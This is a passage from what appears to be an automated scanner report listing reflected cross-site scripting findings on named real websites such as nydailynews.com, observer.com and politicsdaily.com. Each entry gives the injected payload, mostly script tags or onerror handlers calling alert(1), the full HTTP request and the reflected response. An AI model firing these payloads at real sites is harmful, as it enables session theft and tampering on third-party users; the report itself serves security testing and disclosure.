Content-Type: text/html; charset=utf-8
Date: Mon, 28 Feb 2011 13:37:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: AKAMAI_LANG=us; expires=Sun, 29-May-2011 13:37:48 GMT; path=/; domain=.newzealand.com
Set-Cookie: DISPLAY_LANG=en; expires=Sun, 29-May-2011 13:37:48 GMT; path=/; domain=.newzealand.com
Content-Length: 110853

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><title>Getting to New Zealand > New Zealand</title><meta name="descri
...[SNIP]...
<form id="searchform" name="searchform" method="post" action="/travel/getting-to-around-nz/getting-to-nz/getting-to-nz-home.cfm?16db5"><script>alert(1)</script>4d3d7ecd725=1" style="margin:0 0 10px 0;padding:0;">
...[SNIP]...

3.93. http://www.nydailynews.com/favicon.ico96572' [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /favicon.ico96572'

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 21739%3balert(1)//66f60bedeb1 was submitted in the REST URL parameter 1. This input was echoed as 21739;alert(1)//66f60bedeb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico96572'21739%3balert(1)//66f60bedeb1 HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:37:47 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 71477
Set-Cookie: sto-id-sg-web-8080=BPACAKAK; Expires=Mon, 28-Feb-2011 02:37:38 GMT; Path=/

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/favicon.ico96572'21739;alert(1)//66f60bedeb1';
}
//-->
...[SNIP]...

3.94. http://www.nydailynews.com/favicon.ico96572' [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /favicon.ico96572'

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b381'%3balert(1)//d789239fdef was submitted in the REST URL parameter 1. This input was echoed as 9b381';alert(1)//d789239fdef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /9b381'%3balert(1)//d789239fdef HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:38:54 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 71461
Set-Cookie: sto-id-sg-web-8080=CAACAKAK; Expires=Mon, 28-Feb-2011 02:37:37 GMT; Path=/

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
ad) {
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/9b381';alert(1)//d789239fdef';
}
//-->
...[SNIP]...

3.95. http://www.observer.com/author/rex-reed [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.observer.com
Path:   /author/rex-reed

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f7cf"><img%20src%3da%20onerror%3dalert(1)>cf90738becb was submitted in the REST URL parameter 2. This input was echoed as 4f7cf"><img src=a onerror=alert(1)>cf90738becb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /author/rex-reed4f7cf"><img%20src%3da%20onerror%3dalert(1)>cf90738becb HTTP/1.1
Host: www.observer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:38:52 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.6-1+lenny2
Cache-Control: max-age=300, must-revalidate
Content-Type: text/html; charset=utf-8
X-Cache: MISS from VoxCAST
Set-Cookie: SESS0787a3dbcceb3bde8559916a896fa4dd=926d853370bb6b2dab14279ff45a1625; expires=Wed, 23 Mar 2011 17:12:12 GMT; path=/; domain=.observer.com
Connection: close
Content-Length: 25024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<meta name="keywords" content="Rex Reed4f7cf"><img Src=a Onerror=alert(1)>cf90738becb" />
...[SNIP]...

3.96. http://www.observer.com/author/rex-reed [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.observer.com
Path:   /author/rex-reed

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3692c"><script>alert(1)</script>88d8656a531 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /author/rex-reed?3692c"><script>alert(1)</script>88d8656a531=1 HTTP/1.1
Host: www.observer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:53 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.0-8+etch13
Cache-Control: max-age=300, must-revalidate
Content-Type: text/html; charset=utf-8
X-Cache: MISS from VoxCAST
Set-Cookie: SESS0787a3dbcceb3bde8559916a896fa4dd=2739662a9d2c1b42e74d4fe1be78fb88; expires=Wed, 23 Mar 2011 17:11:13 GMT; path=/; domain=.observer.com
Connection: close
Content-Length: 38577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<a href="/node/137699?3692c"><script>alert(1)</script>88d8656a531=1">
...[SNIP]...

3.97. http://www.ohm-chamonix.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ohm-chamonix.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e04d1"><script>alert(1)</script>4e9bd0bc990 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?e04d1"><script>alert(1)</script>4e9bd0bc990=1 HTTP/1.1
Host: www.ohm-chamonix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37101
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQATTTCT=KKCKAEEBEFNIOJCGPPMIJEHA; path=/
X-Powered-By: ASP.NET
Date: Mon, 28 Feb 2011 13:37:39 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Sommair
...[SNIP]...
<a href="/Default.asp?id_lang=2&ampe04d1"><script>alert(1)</script>4e9bd0bc990=1">
...[SNIP]...

3.98. http://www.omeda.com/cgi-win/cso.cgi [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.omeda.com
Path:   /cgi-win/cso.cgi

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98d19<script>alert(1)</script>c5fa55260e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-win98d19<script>alert(1)</script>c5fa55260e8/cso.cgi HTTP/1.1
Host: www.omeda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 13:37:47 GMT
Server: WebSitePro/2.5.8
Accept-ranges: bytes
Content-type: text/html
Content-length: 311

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY bgcolor="White"><H2>404 Not Found</H2>
The requested URL was not found on this server:<P><CODE>/cgi-win98d19<script>alert(1)</script>c5fa55260e8/cso.cgi<P>
...[SNIP]...

3.99. http://www.omeda.com/cgi-win/cso.cgi [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.omeda.com
Path:   /cgi-win/cso.cgi

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fd63e<script>alert(1)</script>a3b84134b87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-win/cso.cgifd63e<script>alert(1)</script>a3b84134b87 HTTP/1.1
Host: www.omeda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 13:37:48 GMT
Server: WebSitePro/2.5.8
Accept-ranges: bytes
Content-type: text/html
Content-length: 304

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY bgcolor="White"><H2>404 Not Found</H2>
The requested URL was not found on this server:<P><CODE>/cgi-win/cso.cgifd63e<script>alert(1)</script>a3b84134b87<P>
...[SNIP]...

3.100. http://www.omeda.com/cgi-win/cso.cgi [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.omeda.com
Path:   /cgi-win/cso.cgi

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3683"><script>alert(1)</script>65a8b28aa1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-win/cso.cgi?c3683"><script>alert(1)</script>65a8b28aa1c=1 HTTP/1.1
Host: www.omeda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 28 Feb 2011 13:37:41 GMT
Server: WebSitePro/2.5.8
Accept-ranges: bytes
Content-type: text/html
Content-length: 40300

<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>CSO Magazine FREE Subscription Application</title
...[SNIP]...
<input type="hidden" name="CALLINGURL" value="c3683"><script>alert(1)</script>65a8b28aa1c=1">
...[SNIP]...

3.101. http://www.openforum.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.openforum.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57900'-alert(1)-'3b360cbf756 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?57900'-alert(1)-'3b360cbf756=1 HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Mon, 28 Feb 2011 13:37:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 28 Feb 2011 13:37:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2819336384.20480.0000; path=/
Content-Length: 105590


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...

       AX.login_link = 'https://www99.americanexpress.com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3f57900'-alert(1)-'3b360cbf756%253d1';
       AX.logout_dest_url = 'https://www.openforum.com/?57900'-alert(1)-'3b360cbf756%3d1';
   /*]]>
...[SNIP]...

3.102. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /xss-cross-site-scripting.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc65b"><script>alert(1)</script>5240444a383 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss-cross-site-scripting.html?dc65b"><script>alert(1)</script>5240444a383=1 HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=6506m8f92ju1v9a6q2mmp0eqo3; path=/
Connection: close
Content-Type: text/html
Content-Length: 21474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
<form id="contactus" method="post" action="/xss-cross-site-scripting.html?dc65b"><script>alert(1)</script>5240444a383=1#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...

3.103. http://www.palmblvd.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.palmblvd.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bd6f1--><script>alert(1)</script>8d9476bb958 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?bd6f1--><script>alert(1)</script>8d9476bb958=1 HTTP/1.1
Host: www.palmblvd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:47 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Mon, 28 Feb 2011 13:38:47 GMT
Connection: close
Content-Type: text/html
Content-Length: 83111

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<TITLE>Palm Boulevard - The Complete Palm OS Information Resource - (Palm Pilot Shareware) - Handspring Visor, Sony Clie, Handera, TRGPr
...[SNIP]...
<!-- marketplace01: Missing QUAD ads for page_type: other on path www.palmblvd.com with position A1
url: /?bd6f1--><script>alert(1)</script>8d9476bb958=1 -->
...[SNIP]...

3.104. http://www.parentdish.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.parentdish.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cc3c"><script>alert(1)</script>055763a2607 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5cc3c"><script>alert(1)</script>055763a2607=1 HTTP/1.1
Host: www.parentdish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:45 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=dallas%3A%3Atx%3A%3Ausa%3A%3A%3A%3Abroadband%3A%3A032.787%3A%3A-096.799%3A%3A5%3A%3A4%3A%3A3%3A%3Aok; expires=Tue, 01-Mar-2011 13:37:45 GMT; path=/
Keep-Alive: timeout=5, max=999984
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 64525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://www.parentdish.com/?5cc3c"><script>alert(1)</script>055763a2607=1" />
...[SNIP]...

3.105. http://www.parkcityinfo.com/visitors/lodging-hotels/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.parkcityinfo.com
Path:   /visitors/lodging-hotels/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d567d"><script>alert(1)</script>72aa3f880de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /visitors/lodging-hotels/?d567d"><script>alert(1)</script>72aa3f880de=1 HTTP/1.1
Host: www.parkcityinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=3385798;expires=Wed, 20-Feb-2041 13:42:42 GMT;path=/
Set-Cookie: CFTOKEN=16832573;expires=Wed, 20-Feb-2041 13:42:42 GMT;path=/
X-Powered-By: ASP.NET
Date: Mon, 28 Feb 2011 13:42:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
                   <html xmlns="http://www.w3.org/1999/xhtml">
                   <head>
                   
           <met
...[SNIP]...
<a class="summer active" rel="1" href="./?SEASON=1&eventID=0&e_sDate=02%2D28%2D11&e_ViewBy=week&e_catID=0&e_keyword=&randomNum=0&e_eDate=&e_pageSize=25&e_pageNum=1&isFeatured=0&startRow=1&d567d"><script>alert(1)</script>72aa3f880de=1&e_sortBy=eventDate&e_cDate=&">
...[SNIP]...

3.106. http://www.pawnation.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pawnation.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76e28"><script>alert(1)</script>68d4300f71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?76e28"><script>alert(1)</script>68d4300f71=1 HTTP/1.1
Host: www.pawnation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:47 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=dallas%3A%3Atx%3A%3Ausa%3A%3A%3A%3Abroadband%3A%3A032.787%3A%3A-096.799%3A%3A5%3A%3A4%3A%3A3%3A%3Aok; expires=Tue, 01-Mar-2011 13:37:47 GMT; path=/
Keep-Alive: timeout=5, max=999817
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 60927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>Paw Nation - Your Sou
...[SNIP]...
<link rel="canonical" href="http://www.pawnation.com/?76e28"><script>alert(1)</script>68d4300f71=1" />
...[SNIP]...

3.107. http://www.pdastreet.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pdastreet.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b5172--><script>alert(1)</script>b1e6f3a905c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b5172--><script>alert(1)</script>b1e6f3a905c=1 HTTP/1.1
Host: www.pdastreet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:51 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Mon, 28 Feb 2011 13:38:51 GMT
Connection: close
Content-Type: text/html
Content-Length: 68576

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<TITLE>PDAStreet - The PDA Network for Handheld Computers, PDA Software, Windows CE, Pocket PC, Palm Pilot, Psion, iPaq, Pocket PC 2002,
...[SNIP]...
<!-- house_ribbon: Missing QUAD ads for page_type: other on path www.pdastreet.com with position V
url: /?b5172--><script>alert(1)</script>b1e6f3a905c=1 -->
...[SNIP]...

3.108. http://www.peppernews.eu/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.peppernews.eu
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91bb0"><script>alert(1)</script>e2cca4fc6b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?91bb0"><script>alert(1)</script>e2cca4fc6b8=1 HTTP/1.1
Host: www.peppernews.eu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:38:09 GMT
Server: Apache/2.2.10 (Linux/SUSE)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=e3ne12b463juklv1ubk7k51rig5ffato; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 77062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="return" value="/?91bb0"><script>alert(1)</script>e2cca4fc6b8=1" />
...[SNIP]...

3.109. http://www.politicsdaily.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.politicsdaily.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd8ea"-alert(1)-"facdad95d64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?fd8ea"-alert(1)-"facdad95d64=1 HTTP/1.1
Host: www.politicsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:57 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999989
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 100254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Politics News, Elec
...[SNIP]...
litics";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,politicsdaily.com";
s_265.mmxgo = true;
s_265.prop1="Politics Daily";
s_265.prop2="Home";
s_265.prop12="http://www.politicsdaily.com/?fd8ea"-alert(1)-"facdad95d64=1";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

3.110. http://www.politicsdaily.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.politicsdaily.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b06d4"><script>alert(1)</script>27c3e4551c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b06d4"><script>alert(1)</script>27c3e4551c5=1 HTTP/1.1
Host: www.politicsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:57 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999990
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 100326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Politics News, Elec
...[SNIP]...
<link rel="canonical" href="http://www.politicsdaily.com/?b06d4"><script>alert(1)</script>27c3e4551c5=1"/>
...[SNIP]...

3.111. http://www.popeater.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popeater.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e413"-alert(1)-"7b6f42f0884 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9e413"-alert(1)-"7b6f42f0884=1 HTTP/1.1
Host: www.popeater.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:53 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=dallas%3A%3Atx%3A%3Ausa%3A%3A%3A%3Abroadband%3A%3A032.787%3A%3A-096.799%3A%3A5%3A%3A4%3A%3A3%3A%3Aok; expires=Tue, 01-Mar-2011 13:37:53 GMT; path=/
Keep-Alive: timeout=5, max=999977
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 63971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
" ;
s_265.linkInternalFilters="javascript:,popeater.com";
    s_265.prop2="news";
    s_265.prop1="popeater";
    s_265.prop6custom="";
    s_265.prop12= "http://www.popeater.com/?9e413"-alert(1)-"7b6f42f0884=1";
    s_265.channel="us.newspop";
    s_265.disablepihost=false;
    s_265.disablepipath=false;
    s_265.mmxtitle="";
    s_265.mmxcustom="";
    s_265.mmxgo=true;
